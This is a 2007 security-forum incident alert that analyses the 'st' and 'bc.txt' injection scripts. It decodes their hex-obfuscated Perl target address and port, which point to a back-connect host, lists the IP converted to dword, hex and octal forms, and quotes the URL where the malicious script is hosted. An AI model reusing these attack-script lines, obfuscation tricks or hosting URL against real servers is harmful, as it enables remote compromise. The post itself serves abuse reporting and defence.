Paul
CastleCops Founder
Joined: Feb 22, 2002
Posts: 27351
|
 Posted: Thu Nov 29, 2007 2:35 am Post subject: [WsIRT#233] Daemon Termination, Evidence Elimination, id Dis |
|
|
Attack Alert
Full Report:  /Daemon_Termination_Evidence_Elimination_id_Disclosure_attack233.html
Changed status to confirmed attack.
IP Converted: 203.166.138.154
dword = 3416689306
hex1 = 0xcba68a9a
hex2 = 0xcb.0xa6.0x8a.0x9a
oct = 0313.0246.0212.0232
217.72.76.70 is the translated value of the bc.txt entry for:
my $target = inet_aton("\x32\x31\x37\x2e\x37\x32\x2e\x37\x36\x2e\x37\x30\x20");
Which has a reverse lookup of ns2.poglej.com.
IP Converted: 217.72.76.70
dword = 3645393990
hex1 = 0xd9484c46
hex2 = 0xd9.0x48.0x4c.0x46
oct = 0331.0110.0114.0106
View CIDR AS10031 Report: http://www.cidr-report.org/cgi-bin/as-report?as=10031
"10031 | SG | apnic | 2000-06-15 | IASPIRE-ASN iASPire.net Pte Ltd"<br />
Extended information for AS10031:
State/Province:
Country: au
Responsible Domain: apnic.net
Abuse Email: abuse*disable*@apnic.net
The port connection is 9991, translated from:
$port = "\x39\x39\x39\x31";
View CIDR AS16016 Report: http://www.cidr-report.org/cgi-bin/as-report?as=16016
"16016 | SI | ripencc | 2000-11-24 | VOLJATEL-AS VOLJATEL Autonomous System"<br />
Extended information for AS16016:
State/Province:
Country: si
Responsible Domain: voljatel.si
Abuse Email: postmaster@voljatel.si
Those values are hexadecimal before translation.
The st and bc.txt scripts are being used to inject into remote exploitable web servers in order to determine how far that remote server can be compromised. Both scripts kill remote server processes like php and inetd, and then attempts to cleanup any evidence they left behind. The second script attempts to TCP connect to 217.72.76.70 on port 9991, but a check of that system doesn't reveal an open port (via a telnet or curl attempt).
| Quote: | | http://203.166.138.154/manual/vhosts/.,/st? |
|
|
Forum FAQ
Search
Usergroups
Profile
Login to check your private messages
Login
